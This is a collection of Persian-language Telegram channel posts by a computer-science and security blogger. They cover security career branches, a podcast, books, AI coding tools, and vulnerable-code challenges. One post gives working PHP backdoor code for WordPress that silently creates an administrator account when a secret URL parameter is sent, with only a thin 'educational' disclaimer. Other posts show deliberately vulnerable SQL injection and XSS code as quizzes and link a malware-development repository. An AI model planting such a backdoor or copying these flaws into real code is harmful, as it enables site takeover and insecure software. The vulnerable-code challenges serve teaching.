#Major #Field #Sec

📃ادامه شاخه ها و گرایش های امنیت سایبری

🔟امنیت اطلاعات (Information Security) :

در این شاخه افرادی که می خواهند وارد شوند باید هم دانش فنی و دانش تئوری خوبی در زمینه های مختلف فناوری اطلاعات و مدیریتی داشته باشند زیرا این شاخه برای جلوگیری و حفاظت از اطلاعات و سیستم های اطلاعاتی در برابر خطرات و تهدیدات می باشد،خیلی از افراد فکر میکنند دانش تئوری فقط در این زمینه کافیست اما این باور غلطی است که خیلی از افراد دارند چرا که کسی که وارد این شاخه می شود باید توانایی درک و تحلیل قوی از سیستم ها داشته باشد با بررسی،ارزیابی و آزمایش سیستم های اطلاعاتی بتوانند بهترین نتیجه را برای محافظت و ایمن کردن آن ها در نظر بگیرید زیرا که با افزایش امنیت،پردازش و عملکرد سیستم ها دچار مشکل نشود.

1⃣1⃣جرم شناسی (Forensic) :

افرادی که در این شاخه فعالیت می کنند دانش نسبتا خوبی در زمینه تست نفوذ و هم چنین شبکه و رمزنگاری دارند،کار آن ها ردیابی مجرمان سایبری می‌باشد یا بهتر است بگوئیم هکرهای مخرب،آن ها از طریق ابزارهای که در این زمینه استفاده می کنند و همچنین از طریق بررسی پرونده ها و فایل ها و سیستم های مختلف و لاگ خوانی می توانند مجرمان را پیدا کنند و آن ها را تحویل قانون دهند.

2⃣1⃣مرکز عملیات امنیت (Security Operation Center) :

افرادی که در این شاخه فعالیت می کنند دانش نسبتا خوبی در زمینه های مختلف امنیت سایبری دارند،در واقع باید گفت این شاخه متشکل از یک تیم حرفه ای برای بررسی و پویش و مانتیورینگ و انجام ارزیابی و تست سیستم ها و همچنین شناسایی،شکار حوداث و تهدیدات و تجزیه و تحلیل آن ها و جلوگیری از حملات و تهدیدات است که بصورت شبانه روزی سیستم های یک سازمان را رصد و مانتیور می کنند،که دارای بخش های مختلفی می باشد هر بخش از تیم کارهای متفاوتی را انجام می دهند.

3⃣1⃣کد نویسی امن (Secure Coding) :

افرادی که در این شاخه فعالیت می کنند دارای مهارت برنامه نویسی قوی هستند که توانایی تحلیل و ارزیابی کدها دارند و کدهای آسیب پذیر را پیدا می کنند و به جای آن کدهای ایمن تری را می نویسند تا ضعف های کمتری یک برنامه داشته باشد(امنیت هیچ گاه صد در صد نیست)همچنین افراد از ابزارهای مختلفی در این زمینه استفاده می کنند تا سریعتر به نتیجه برسند،این حوزه خود به زیر شاخه های تبدیل می شود که به آن ها اشاره نمیکنیم زیرا شما با توجه به شاخه های که گفته شده است می توانید حدس بزنید چه زیرشاخه های دارد.

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)
🆔 @HamedMoqaddasi

#پادکست
🎤 رادیو امنیت - Safe Cast - قسمت یازدهم

🔗 لینک CastBox
https://lian.ac/safe-cast-11

💠 چکیده اخبار این هفته:
✅ هک Cloudflare
✅ هک Anydesk و ارتباط آن با Cloudflare
✅ آسیب پذیری بحرانی Bootloader در Shim
✅بخش ویژه: Hack Case Study : TalkTalk

🔺 با اجرای: رضا الفت - 24 بهمن 1402

🔸 اطلاعات بیشتر:
☺️ 02191004151 | 😎 WhatsApp | 😎 Telegram

💻 گروه لیان
🔗 https://liangroup.net/
🕊 @AcademyLian

#Book #Security #Fuzzing

📃کتاب فازینگ نرم افزار برای ارزیابی امنیتی
{Fuzzing For Software Security Testing}

👌کتاب فوق به افرادی که در زمینه امنیت نرم افزار کار میکنند کمک می کند تا دانش  جامعی از عملیات فازینگ در دنیای امنیت را فرا بگیرند

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

👁‍🗨دِوین،اولین مهندس نرم‌افزار هوش مصنوعی

این هوش مصنوعی،یه برنامه‌نویس که خودش میتونه با ابزارهای مختلف کدنویسی،کد ادیتورها و مرورگرهای وب، مشکلات نرم‌افزاری رو حل کنه

آیا هوش مصنوعی بطور کل میتونه جایگزین کاملی برای مهندسین نرم افزار و توسعه دهندگان بشه🤔❗️

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#AI #Tools #Site #Programming

👁‍🗨 این هوش مصنوعی مخصوص برنامه‌نویس ها و کسانی که میخواهند بهتر کدها را بفهمند و تحلیل کنند

✳️ با استفاده از این ابزار هوش مصنوعی می‌تونی هر کدی رو که دستت اومده مثه آب خوردن تحلیل کنی و حتی بهینه ش کنی.


🌀 اگه دنبال راهی واسه فهمیدن کدهای پیچیده هستید، این ابزار می‌تونه در این زمینه کمکتون کنه.

🌐 https://codetoflow.com

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Video #Short
حرف های خالق زبان CPP

بیش از اندازه روی یک حوزه متخصص نشوید...

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Programming #Code #Security #PHP #WordPress #Backdoor

چطور با زبان PHP  یک ادمین در وردپرس بسازیم ؟

کافیه کد زیر را در درون کدهای قالب سایت یا افزونه قرار بدبد

add_action( 'wp_head', 'add_user_in_wp' );

function add_user_in_wp() {
If ($_GET['@HamedMoqaddasi'] == '@Elecompino') {
require('wp-includes/registration.php');
If (!username_exists('@ZeroDayResearch')) {
$user_id = wp_create_user('@ZeroDayResearch', '@ZeroDayAcademyCom);
$user = new WP_User($user_id);
$user->set_role( 'administrator' );
}
}
}

وقتی کد مربوطه را قرار دادید اتفاق خاصی رقم نمی‌خوره اما به محض اینکه لینک زیر رو بزنید


https:/site.com/?@HamedMoqaddasi=@Elecompino

🌀جای عبارت site.com آدرس دامنه سایت وردپرس مربوطه را قرار بدید یک کاربر ادمین با نام کاربری @ZeroDayResearch و رمز عبور @ZeroDayAcademyCom براتون ساخته میشه و میتونید از طریق LoginPage وردپرس وارد پیشخوان وردپرس بشید.

👁‍🗨به این نوع کدها میگن بکدور که به اونا پرداخته خواهد شد

❌این پست صرفا جنبه آموزشی دارد و هرگونه سوءاستفاده از آن برعهده خود شخص می باشد،هرچند این روش خیلی راحت قابل شناسایی می باشد

✳️ادامه دارد.....

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔@HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PHP

🔍آیا کد PHP زیر آسیب پذیری داره یا نه،اگر آسیب پذیری داره چه نوع آسیب پذیریه  و به چه دلیل؟!

<?php
$user_input = $_GET['username']; 


$sql = "SELECT * FROM users WHERE username = '$user_input'";
$result = $conn->query($sql);

if ($result->num_rows > 0) {
    echo "Login successfully!<br>";
} else {
    echo "Login failed.<br>";
}

?>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Mobile #Android #Tools #Sec

🛡شاید بعنوان یک برنامه نویس یا کسی که در حیطه امنیت نرم افزار(مخصوصا امنیت نرم افزارهای اندروید)کار می‌کنه میخواهی بدونی یک اپلیکیشن چه آسیب پذیری های داره،میتونی از ابزار APKDeepLens استفاده کنی،این ابزار رو میتونه این کار رو برات انجام بده

🌐 https://github.com/d78ui98/APKDeepLens

👈خوبی این ابزار اینه که براساس Owasp Top 10 آسیب پذیری ها رو پوشش میده و کلی قابلیت دیگه بهت میده

❌دوستانی که بطور تخصصی در حیطه امنیت کار میکنند یا کار خواهند کرد،همیشه به ابزار اکتفا نکنید و بصورت دستی تست رو هم انجام بدید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #PY #JS

🔍نمونه کد ساده برای آسیب پذیری SQL Injection در  NodeJs و Django

کد زیر مربوط به NodeJs می باشد.👇

#NodeJS
const express = require('express');
const app = express();
const port = 3000;

app.get('/user', (req, res) => {
  const username = req.query.username; 

  const query = SELECT * FROM users WHERE username = '${username}';
  
  db.query(query, (err, results) => {
    if (err) throw err;
    res.json(results);
  });
});

app.listen(port, () => {
  console.log(Server running at http://localhost:${port});

کد زیر مربوط به Django می باشد.👇

#Django
from django.http import JsonResponse
from .models import User

def vulnerable_view(request):
    username = request.GET.get('username')  
  
    query = f"SELECT * FROM myapp_user WHERE username = '{username}'"
    users = User.objects.raw(query)

    result = [{'username': user.username, 'email': user.email} for user in users]
    return JsonResponse(result, safe=False)

👈کد PHP مربوط به آسیب پذیری SQLi اینجا ببنید👉

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#AI #Tools #Python

👁‍🗨کنترل کامپیوتر با استفاده از زبان طبیعی

✳️با استفاده از ابزار یا هوش مصنوعی زیر که با پایتون توسعه داده شده میتونید در محیط Shell با کمک این ابزار کارهای متفاوتی از قبیل کدنویسی و تجزیه و تحلیل آن،
ساخت و ویرایش عکس ها و ویدیوها و فایل ها و... انجام دهید

✅با نصب داشتن پایتون در سیستم خود و اجرای دستور زیر در محیط CLI،بطور خودمونی همون Terminal یا CMD میتونید Open Interpreter را نصب کنید

pip install open-interpreter

با دستور زیر آن را اجرا کنید

interpreter

برای اطلاعات بیشتر میتونید به مخزن یا Repository  گیت هاب مراجعه کنید👇

🌐 https://github.com/OpenInterpreter/open-interpreter

و همچنین برای مطالعه داکیومنت آن از لینک زیر استفاده کنید👇
🌐 https://docs.openinterpreter.com/getting-started/setup


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Challenge #Programming  #Code #VulnerableCode #PHP

👈ادامه چالش کدهای آسیب پذیر👉

🔍کد PHP چه نوع آسیب پذیری داره و به چه دلیل؟!

<!DOCTYPE html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <noscript>Vulnerable Code Challenge</noscript>
</head>
<body>
    <h1>@HamedMoqaddasi</h1>
    <form action="" method="get">
        <input type="text" name="input" placeholder="Send Your Text" />
        <button type="submit">Send</button>
    </form>
    <div>
        <h2>Output:</h2>
        <p><?php echo $_GET['input']; ?></p>
    </div>
</body>
</html>

✳️سطح این چالش ساده می باشد

✅جواب خودتون رو در زیر همین پست کامنت کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Book #AI #RoadMap

📃نقشه راه یادگیری هوش مصنوعی (AI)

👌در این کتابچه به شما از مباحث پایه تا پیشرفته برای یادگیری حوزه هوش مصنوعی نقشه راه تعبیه شده که به شما کمک میکند مسیر خود را پیدا کنید

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

👁‍🗨هوش مصنوعی که به شما در نوشتن کدها کمک می کنه

🌐 https://www.tabnine.com

این سرویس از Deep Learning برای کمک به نوشتن کدهای سریع تر استفاده می کنه،همچنین توجه داشته باشید برای اولین بار میتونید با ایمیل خودتون تا 90 روز ازش بصورت رایگان استفاده کنید،کلا بهتره از  سرویس های ایمیل فیک مانند tempmail استفاده کنید.

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Web #Tools #Architecture
👁‍🗨مهم ترین معماری های دنیای وب

❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Source #Github #Rust #MD #Programming

👁‍🗨‏اگه به برنامه نویسی بدافزار اونم با زبان RUST علاقه مندید و دوست دارید باهاش در زمینه Malware Development  کار کنید،یکی از بهترین منابعی که به طور منظم آپدیت میشه و میتونید ازش استفاده کنید این مخزن گیت هابه👇


🌐 https://github.com/Whitecat18/Rust-for-Malware-Development


🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Web #TCP #UDP #Architecture

👈قراره توی نسخه‌های بعدی Google Chrome امکان استفاده از سوکت TCP و UDP اضافه بشه،اینکار به برنامه نویسان این امکان ارائه میده تا نرم افزارهای تحت وب رو با عملکرد بهتری ارائه بدن

برای اطلاعات بیشتر در این رابطه لینک زیر رو دنبال کنید

https://wicg.github.io/direct-sockets


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X

#Site #Security #Article #BugHunting

اگر میخواهی نمونه آسیب پذیری و گزارش واقعی در حوزه Bug Hunting ببینی و همچنین یکسری مقاله در این حوزه مطالعه کنی می تونی به سایت زیر مراجعه کنید

🌐   https://huntr.com‎


❇️با من همراه باشید

♻️به اشتراک بگذارید

🔗کانال شخصی حامد مقدسی پور(مهندسی و علوم کامپیوتر)

🆔 @HamedMoqaddasi

YouTube ➖ Linkedin ➖ Instagram ➖ X